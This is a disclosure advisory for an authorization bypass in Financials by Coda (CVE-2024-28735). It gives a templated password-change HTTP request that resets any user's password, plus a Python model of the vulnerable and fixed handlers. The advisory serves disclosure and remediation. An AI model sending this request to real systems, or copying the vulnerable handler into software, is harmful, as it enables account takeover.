Financials By Coda Authorization Bypass
Authored by Leo Draghi
Financials by Coda versions prior to 2023Q4 suffer from an incorrect access control authorization bypass vulnerability. The Change Password feature can be abused in order to modify the password of any user of the application.
advisories: CVE-2024-28735
SHA-256: b902e8c8533e18988a3d9cf1a301f95fdca312dbda532a060668f36b710b0b68
# Vulnerability type: Incorrect Access Control
# Vendor: https://www.unit4.com/
# Product: Financials by Coda
# Product site: https://www.unit4.com/fr/products/financial-management-software
# Affected version: < 2023Q4
# Fixed version: 2023Q4
# Credit: Léo DRAGHI
# CVE: CVE-2024-28735
# PROOF OF CONCEPT
The "Change Password" feature can be abused in order to modify the password of any user of the application.
The only conditions for an attacker are to have the credentials of a valid account (regardless of the profile) and to know the username of the target.
POST /coda/rest/session/password HTTP/2
Host: <target>
<snip>
{
"user" : "<targeted_user>",
"password" : "<attacker_user_password>",
"company" : "<company>",
"newPassword" : "<new_password_for_targeted_user>",
"tzOffset" : 240
}
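The request above works because the endpoint checks the supplied "password" against the caller's own account but applies "newPassword" to whatever account the "user" field names, so the target is never bound to the authenticated identity. The following Python model is an added illustration of that flaw and of the fix, written for this page; it is not Unit4's code and makes no claim about how Financials by Coda is implemented internally. The user store, the `change_password_vulnerable` and `change_password_fixed` handlers, the `session_user` argument standing in for the authenticated session, and the sample usernames and passwords are all constructed for the example (the "company" and "tzOffset" fields are carried only to mirror the request shape).

```python
"""Model of the access-control flaw behind CVE-2024-28735 and its fix.

Hypothetical stand-in for a 'change password' endpoint, not vendor code.
The vulnerable variant authenticates the caller with the current password
it is given, then writes the new password to whichever account the JSON
body names, which is the behaviour the advisory describes.
"""
import hashlib
import hmac
import os

_ITERATIONS = 50_000  # kept modest so the demo runs quickly


def _hash_pw(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, _ITERATIONS)


def make_store(creds: dict) -> dict:
    """Constructed in-memory user store: username -> (salt, pbkdf2 digest)."""
    store = {}
    for name, pw in creds.items():
        salt = os.urandom(16)
        store[name] = (salt, _hash_pw(pw, salt))
    return store


def verify(store: dict, user: str, password: str) -> bool:
    rec = store.get(user)
    if rec is None:
        # Do equivalent work so unknown users are not distinguishable by timing.
        _hash_pw(password, b"\x00" * 16)
        return False
    salt, digest = rec
    return hmac.compare_digest(_hash_pw(password, salt), digest)


def set_password(store: dict, user: str, new_password: str) -> None:
    salt = os.urandom(16)
    store[user] = (salt, _hash_pw(new_password, salt))


class Unauthorized(Exception):
    pass


class Forbidden(Exception):
    pass


def change_password_vulnerable(store: dict, session_user: str, body: dict) -> str:
    """Authenticates session_user with body['password'], then writes
    body['newPassword'] to body['user']: the target is never tied to the caller."""
    if not verify(store, session_user, body["password"]):
        raise Unauthorized("current password rejected")
    set_password(store, body["user"], body["newPassword"])
    return body["user"]


def change_password_fixed(store: dict, session_user: str, body: dict) -> str:
    """Same credential check, but the account being changed must be the
    authenticated one; the body's 'user' field is never trusted as the target."""
    if body.get("user") != session_user:
        # Generic refusal: the endpoint must not double as a username oracle.
        raise Forbidden("a session may only change its own password")
    if not verify(store, session_user, body["password"]):
        raise Unauthorized("current password rejected")
    set_password(store, session_user, body["newPassword"])
    return session_user


def demo() -> tuple:
    """Replays the advisory's request shape against both handlers.

    Returns (takeover_succeeded_on_vulnerable, takeover_blocked_on_fixed)."""
    body = {"user": "victim", "password": "att-pw", "company": "ACME",
            "newPassword": "pwned", "tzOffset": 240}

    store = make_store({"attacker": "att-pw", "victim": "vic-pw"})
    change_password_vulnerable(store, "attacker", dict(body))
    takeover = verify(store, "victim", "pwned")

    store = make_store({"attacker": "att-pw", "victim": "vic-pw"})
    try:
        change_password_fixed(store, "attacker", dict(body))
        blocked = False
    except Forbidden:
        blocked = True
    return takeover, blocked and verify(store, "victim", "vic-pw")


if __name__ == "__main__":
    print(demo())  # (True, True)
```

The fix is a binding, not an extra check: the account whose password changes is taken from the authenticated session only, and any client-supplied "user" that disagrees is rejected before the credential is even verified. When reviewing a password-change or profile-update handler, look for exactly this pattern of a caller-controlled identifier reaching the write path after authentication has already succeeded for a different identity.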
# TIMELINE
– 30/10/2023: Vulnerability found
– 02/11/2023: Vendor informed
– 05/12/2023: Vendor fixed the issue
– 14/03/2024: Public disclosure